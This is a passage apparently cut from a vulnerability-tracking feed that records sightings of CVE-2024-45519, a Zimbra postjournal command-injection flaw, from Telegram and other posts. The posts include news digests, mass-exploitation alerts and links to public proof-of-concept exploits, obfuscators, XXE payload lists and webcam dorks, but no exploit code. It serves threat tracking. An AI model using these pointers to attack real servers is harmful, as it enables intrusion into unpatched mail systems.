CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:23:53.000000Z"}, {"uuid": "9a8f3a19-91a8-41d2-8366-4f677ac2c10c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7500", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:21.000000Z"}, {"uuid": "9f5ab129-dff9-4459-b305-04f09859b58d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/true_secator/6248", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0442\u0440\u0435\u043d\u0434\u044b \u043f\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c.\n\n1. \u0412\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-45519 \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043f\u043e\u0447\u0442\u044b postjournal \u043f\u043e\u0447\u0442\u043e\u0432\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 Zimbra Collaboration, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0447\u0435\u0440\u0435\u0437 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b SMTP.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0441\u0432\u0435\u0442\u0438\u043b\u0438 \u041f\u043e\u0437\u0438\u0442\u0438\u0432\u044b, \u043f\u043e\u043a\u0430\u0437\u0430\u0432 \u0432\u0438\u0434\u0435\u043e \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 CVE-2024-45519, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 
\u0441\u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043a\u043e\u0440\u0443\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0421yberok \u043d\u0430 \u0441\u0432\u043e\u0438\u0445 \u0440\u0430\u0434\u0430\u0440\u0430\u0445 \u0421\u041a\u0418\u041f\u0410 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u044e\u0442 \u0431\u043e\u043b\u0435\u0435 10\u043a \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0430\u043b\u043b\u044f\u0446\u0438\u0439 Zimbra Collaboration \u0432 \u0420\u0443\u043d\u0435\u0442\u0435, \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0431\u043e\u043b\u0435\u0435 3\u043a \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0445 IP \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u044e\u0442 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043f\u043e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0443 SMTP \u0438 \u043d\u0435 \u0438\u043c\u0435\u044e\u0442 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439, \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0430\u044f\u0441\u044c \u0440\u0438\u0441\u043a\u0443 \u0430\u0442\u0430\u043a \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c CVE-2024-45519.\n\n\u0420\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u043a\u0440\u0430\u0439\u043d\u0435 \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f 
\u043d\u0430 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0435 \u0448\u043b\u044e\u0437\u044b Zimbra Collaboration.\n\n2. \u0410\u0432\u0441\u0442\u0440\u0438\u0439\u0441\u043a\u0430\u044f CyberDanube \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043e \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0434\u043e \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0418\u0411\u041f-\u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438 Riello UPS.\n\n\u041a\u0430\u043a \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438, \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u043d\u0435 \u0441\u043c\u043e\u0433 \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u043a\u0430\u0440\u0442\u0435 \u0441\u0432\u044f\u0437\u0438 NetMan 204 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 \u0441\u0438\u0441\u0442\u0435\u043c \u0418\u0411\u041f Riello \u0432 \u0441\u0440\u0435\u0434\u043d\u0438\u0435 \u0438 \u043a\u0440\u0443\u043f\u043d\u044b\u0435 \u0441\u0435\u0442\u0438.\n\n\u041e\u0434\u043d\u0430 \u043d\u0438\u0445 CVE-2024-8877 - \u044d\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c 
SQL-\u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0434\u043b\u044f \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u0436\u0443\u0440\u043d\u0430\u043b\u0430.\n\n\u0412\u0442\u043e\u0440\u0430\u044f CVE-2024-8878 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0434\u043b\u044f \u0441\u0431\u0440\u043e\u0441\u0430 \u043f\u0430\u0440\u043e\u043b\u044f.\n\nCyberDanube \u0443\u0432\u0435\u0434\u043e\u043c\u0438\u043b\u0430 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 \u0438\u044e\u043d\u0435, \u043e\u0434\u043d\u0430\u043a\u043e Riello \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0430, \u0447\u0442\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0437\u0430\u0439\u043c\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u0435 \u0432\u0440\u0435\u043c\u0435\u043d\u0438, \u0447\u0435\u043c \u043e\u0436\u0438\u0434\u0430\u043b\u043e\u0441\u044c.\n\n3. 
\u0420\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b Bitsight \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u043e\u0446\u0435\u043d\u043a\u0438 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u0440\u043e\u0432\u043d\u0435\u043c\u0435\u0440\u0430\u0445 ATG \u0432 \u0431\u0430\u043a\u0430\u0445, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432 10 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0443 \u043f\u044f\u0442\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u043e\u0432 Alisonic, Dover Corp, Franklin Fueling Systems, Maglink \u0438 Omntec, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0432 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u0445 \u0441\u0435\u043a\u0442\u043e\u0440\u0430\u0445.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c \u0440\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u0438\u0437\u0443\u0447\u0438\u043b\u0438 \u0448\u0435\u0441\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c ATG \u043e\u0442 \u043f\u044f\u0442\u0438 \u0440\u0430\u0437\u043d\u044b\u0445 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u043e\u0432 \u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u0432 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 10 \u0434\u044b\u0440 (\u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0440\u044f\u0434 0-day), \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0438\u0445 Maglink LX \u0438 LX4, OPW SiteSentinel, Proteus OEL8000, Alisonic Sibylla \u0438 Franklin TS-550.\n\n\u0421\u0435\u043c\u0438 
\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d\u044b \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0443\u0440\u043e\u0432\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438. They involve authentication bypass, hard-coded credentials, and execution of OS commands and SQL. The rest are high-severity XSS issues, EoP and arbitrary file read.\n\nAll of the vulnerabilities allow obtaining full administrator rights to the device application, and some of them full access to the 
operating system.\n\nIn a real-world scenario, a hacker could use the vulnerabilities to cause a DoS condition and disable the devices. Bitsight warns that attackers could also cause physical damage.\n\nThe scan results allowed Bitsight to identify thousands of exposed and vulnerable ATG devices, especially in the US and Europe, including those used in airports, 
government organizations, manufacturing facilities and utilities.\n\n4. As expected, attackers have begun actively exploiting an authentication bypass vulnerability to take control of Ivanti Virtual Traffic Manager (vTM) servers. The attacks target CVE-2024-7593, which Ivanti fixed in August, and a PoC was already available at that time.\n\n5. 
VulnCheck has disclosed all the vulnerabilities that the Chinese APT Flax Typhoon used to build the Raptor Train botnet, which was taken down the other day. There were 66 of them!", "creation_timestamp": "2024-09-25T17:30:05.000000Z"}, {"uuid": "f812860e-ad60-4ef1-931c-57fb064f835e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/true_secator/6268", "content": "We continue covering the main vulnerabilities; in brief, here is how things stand with the rest this week:\n\n1. 
France's LEXFO discovered two vulnerabilities in the extremely popular JupiterX WordPress and WooCommerce theme. \n\nThey are an authentication bypass and an RCE that could allow attackers to take over vulnerable sites.\n\nThe requirements for exploitation include a form with a file upload field.\n\nJupiterX is the eighth best-selling item on the ThemeForest marketplace, with more than 178,000 sales.\n\n2. 
VideoLAN released a fix for the VLC media player to address a vulnerability that could allow attackers to execute code via a malicious MMS stream.\n\n3. Project Discovery researchers discovered a vulnerability in the Zimbra email platform that can be used to take over unpatched servers.\n\nThe vulnerability is tracked as CVE-2024-45519 and affects the PostJournal service, allowing 
unauthenticated attackers to execute arbitrary commands on vulnerable installations.\n\nZimbra fixed the bug in its September update.\n\n4. Researcher Patrik Kovalski published details of a patched vulnerability that bypasses the iOS Screen Time parental control system. \n\nThe bug could be used to obtain the Screen Time password and disable the feature.\n\n5. 
Assetnote researchers found an anomaly in the Great Firewall of China caused by manipulation of DNS responses when domains contain blacklisted or blocked keywords.\n\nThe researchers believe that this undocumented behavior could be used to carry out DNS poisoning attacks.", "creation_timestamp": "2024-10-01T18:40:05.000000Z"}, {"uuid": "5d4b28b4-0f93-432d-8a2c-5dcee9b9c11f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/Root_Revolution/24", "content": "\ud83c\udccf  CVE-2024-45519 is a 
vulnerability in Zimbra Collaboration (ZCS) that allows unauthenticated users to execute commands through the postjournal service. This guide walks you through setting up a lab environment to reproduce the issue and execute the exploit. \ud83c\udccf \n\nhttps://github.com/Chocapikk/CVE-2024-45519", "creation_timestamp": "2024-10-05T11:50:39.000000Z"}, {"uuid": "df3efb8a-592f-4195-a3a9-e5a506224365", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/9184", "content": "Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution/", "creation_timestamp": "2024-10-01T19:58:18.000000Z"}, {"uuid": "57e94046-d125-45c8-b2c2-e2ec55af951e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1066", "content": "Tools - Hackers Factory \n\nMemProcFS-Analyzer - Automated Forensic Analysis of Windows Memory Dumps for DFIR \n\nhttps://github.com/evild3ad/MemProcFS-Analyzer\n\nTeamViewer User to Kernel Elevation of Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.\n\nhttps://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481\n\nGet PROXY List that gets updated everyday \n\nhttps://github.com/TheSpeedX/PROXY-List\n\nPrying Deep - An OSINT tool to collect intelligence on the dark web\n\nhttps://github.com/iudicium/pryingdeep\n\nA tool for scanning public or private AMIs for sensitive files and secrets. The tool follows the research made on AWS CloudQuarry where we scanned 20k+ public AMIs. 
\n\nhttps://github.com/saw-your-packet/CloudShovel\n\nCVE-2024-45519\n\nhttps://github.com/p33d/CVE-2024-45519\n\nCVE-2024-0044: a \"run-as any app\" high-severity vulnerability affecting Android versions 12 and 13 \n\nhttps://github.com/pl4int3xt/cve_2024_0044\n\nGoogle & Shodan Dorks for WebCam\n\nhttps://github.com/ExploitXpErtz/WebCam-Google-Shodan-Dorks\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-14T06:00:43.000000Z"}, {"uuid": "ea8f99ad-a9c0-4cc9-bebd-52ba61b02075", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/InfoSecInsider/423", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:08.000000Z"}, {"uuid": "a00cdefa-ec14-4e45-ad00-a1ad668a5b2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/InfoSecInsider/424", "content": "\u26a1\ufe0fZimbra - Remote Command Execution (CVE-2024-45519).\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:08.000000Z"}, {"uuid": "65be7875-7e47-4b2b-8d09-a24688bc9b09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/474", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! 
\n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:33.000000Z"}, {"uuid": "6955f848-6990-4afa-9f4f-9d076fcd251a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-10-03T21:10:01.000000Z"}, {"uuid": "bcff61aa-bb2d-478e-a985-979eeaaea317", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3lkv3l2oy7u2j", "content": "", "creation_timestamp": "2025-03-21T11:16:17.147727Z"}, {"uuid": "476c6fef-1b5f-4e47-9ff2-a95c47e8bd7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": 
"https://t.me/HackingInsights/14494", "content": "\u200aZimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution/", "creation_timestamp": "2024-09-28T10:56:35.000000Z"}, {"uuid": "f571fbe0-d797-472a-b66f-ae5bb347e4e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/2598", "content": "Zimbra\n - Remote Command Execution (CVE-2024-45519)\n\ngithub.com/Chocapikk/CVE-2024-45519", "creation_timestamp": "2025-03-02T10:34:26.000000Z"}, {"uuid": "3a4f3fcd-111c-4711-9564-763720cedc1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/6424", "content": "\ud83d\udea8CVE-2024-45519 - Zimbra Postjournal Exploit Setup\n\nhttps://darkwebinformer.com/cve-2024-45519-zimbra-postjournal-exploit-setup/", "creation_timestamp": "2024-11-05T22:12:11.000000Z"}, {"uuid": "d14f6fc1-0b15-4c8f-84a8-ac5aa9852d0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/CyberBulletin/1012", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:35:52.000000Z"}, {"uuid": "eb44571b-4f63-4a99-b4f3-7610c3ef1858", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "Telegram/CkXBWnwBfBoySBukTmGlFhbCoxZd7mul-lMTkTsWlZiBLw", "content": "", "creation_timestamp": "2024-10-02T09:40:30.000000Z"}, 
{"uuid": "af2bf742-5769-40e4-8d2e-67bf8df16dff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/ZeroEthical_Course/1607", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-29T12:26:59.000000Z"}, {"uuid": "fd3488df-0cb7-4d62-b67a-90b800becfaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/HackingInsights/15229", "content": "\u200aZimbra Email Servers Under Attack: CISA Flags CVE-2024-45519 as Actively Exploited\n\nhttps://securityonline.info/zimbra-email-servers-under-attack-cisa-flags-cve-2024-45519-as-actively-exploited/", "creation_timestamp": "2024-10-05T17:00:36.000000Z"}, {"uuid": "6e83d0fe-992d-4129-9efe-0473f016e069", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/HackingInsights/15046", "content": "Critical Zimbra Postjournal flaw CVE-2024-45519 actively exploited in the wild. 
Patch it now!\nhttps://ift.tt/duWePKx", "creation_timestamp": "2024-10-03T08:40:35.000000Z"}, {"uuid": "cb2cf514-9299-4cd4-9c74-4817cd7a1e40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/15385", "content": "\u200a19.6K+ Public Zimbra Installations Vulnerable to Code Execution Attacks \u2013 CVE-2024-45519\n\nhttps://gbhackers.com/zimbra-installations-code-execution-attack/", "creation_timestamp": "2024-10-08T03:27:20.000000Z"}, {"uuid": "28554b3b-3f51-4eeb-a050-8c75efc91116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/KomunitiSiber/2661", "content": "Researchers Warn of Ongoing Attacks Exploiting Critical Zimbra Postjournal Flaw\nhttps://thehackernews.com/2024/10/researchers-sound-alarm-on-active.html\n\nCybersecurity researchers are warning about active exploitation attempts targeting a newly disclosed security flaw in Synacor's Zimbra Collaboration.\nEnterprise security firm Proofpoint said it began observing the activity starting September 28, 2024. 
The attacks seek to exploit CVE-2024-45519, a severe security flaw in Zimbra's postjournal service that could enable unauthenticated attackers to", "creation_timestamp": "2024-10-02T13:28:40.000000Z"}, {"uuid": "581897e9-51fd-4657-91f1-623b35ed08a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/true_secator/6271", "content": "Researchers warn of active exploitation of a critical Zimbra postjournal vulnerability, which began a day after a PoC appeared.\n\nCVE-2024-45519 allows attackers to execute commands on a vulnerable server without authentication and was fixed in Zimbra versions 9.0.0 Patch 41, 10.0.9, 10.1.1 and 8.8.15 Patch 46.\n\nAlthough 
the company did not disclose details and the vulnerability has not yet been added to NIST (NVD), last week ProjectDiscovery published technical information about the vulnerability together with a PoC exploit.\n\nAccording to ProjectDiscovery, the core problem is the lack of sanitization of user-supplied input, which allows attackers to craft SMTP messages to inject commands into the Postjournal service.\n\nThe service is disabled by default, 
but attackers can exploit the vulnerability remotely on servers where it is enabled, if the attack comes from an allowed network range.\n\nThe first attempts to exploit CVE-2024-45519 were recorded by Proofpoint as early as September 28, the day after ProjectDiscovery released its report on the vulnerability.\n\nEmails spoofing Gmail were sent to fake addresses in the CC fields, 
